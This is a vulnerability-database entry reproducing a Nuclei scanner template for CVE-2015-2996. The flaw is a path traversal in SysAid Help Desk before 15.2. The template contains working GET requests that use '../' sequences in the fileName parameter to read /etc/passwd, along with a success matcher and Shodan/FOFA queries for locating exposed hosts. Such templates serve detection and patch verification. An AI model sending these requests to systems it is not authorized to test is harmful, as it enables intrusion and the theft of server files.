Lucene search
ProjectDiscoveryNUCLEI:CVE-2015-2996HistorySep 27, 2022 - 9:42 p.m.
SysAid Help Desk <15.2 - Local File Inclusion
2022-09-2721:42:24
ProjectDiscovery
github.com
7
cve-2015-2996
sysaid
local file inclusion
CVSS2
8.5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:P/I:N/A:C
AI Score
6.8
Confidence
Low
EPSS
0.449
Percentile
97.4%
SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.
id: CVE-2015-2996
info:
name: SysAid Help Desk <15.2 - Local File Inclusion
author: 0x_Akoko
severity: high
description: |
SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.
impact: |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server.
remediation: |
Upgrade SysAid Help Desk to version 15.2 or later to mitigate the vulnerability.
reference:
- https://seclists.org/fulldisclosure/2015/Jun/8
- https://www.sysaid.com/blog/entry/sysaid-15-2-your-voice-your-service-desk
- http://seclists.org/fulldisclosure/2015/Jun/8
- https://nvd.nist.gov/vuln/detail/CVE-2015-2996
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:C
cvss-score: 8.5
cve-id: CVE-2015-2996
cwe-id: CWE-22
epss-score: 0.77754
epss-percentile: 0.98153
cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: sysaid
product: sysaid
shodan-query: http.favicon.hash:1540720428
fofa-query: icon_hash=1540720428
tags: cve2015,cve,sysaid,lfi,seclists
http:
- method: GET
path:
- "{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"
- "{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# digest: 4a0a0047304502210082e020d9e8b2d5d7e7bef721183a3753d3d1f6e6d5edac73c48741770d80b66602205d8cf502e70a1a70092bcd7073f6e35af23efdbb2810f7f5d4def6c4926d45b4:922c64590222798bb761d5b6d8e72950Related
nvd
nvd
CVE-2015-2996
2015-06-08 14:59:04
prion
prion
Directory traversal
2015-06-08 14:59:00
openvas
openvas
SysAid Path < 15.2 Directory Traversal Vulnerability
2015-06-11 00:00:00
cvelist
cvelist
CVE-2015-2996
2015-06-08 14:00:00
cve
cve
CVE-2015-2996
2015-06-08 14:59:04
metasploit
metasploit
SysAid Help Desk Arbitrary File Download
2015-06-03 20:59:45
SysAid Help Desk Database Credentials Disclosure
2015-06-03 20:46:48
packetstorm
packetstorm
SysAid Help Desk Database Credentials Disclosure
2024-08-31 00:00:00
SysAid Help Desk Arbitrary File Download
2024-08-31 00:00:00
securityvulns
securityvulns
exploitpack
exploitpack
SysAid Help Desk 14.4 - Multiple Vulnerabilities
2015-06-10 00:00:00
zdt
zdt
SysAid Help Desk 14.4 Multiple Vulnerabilities
2015-06-04 00:00:00
exploitdb
exploitdb
SysAid Help Desk 14.4 - Multiple Vulnerabilities
2015-06-10 00:00:00
CVSS2
8.5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:P/I:N/A:C
AI Score
6.8
Confidence
Low
EPSS
0.449
Percentile
97.4%
Related for NUCLEI:CVE-2015-2996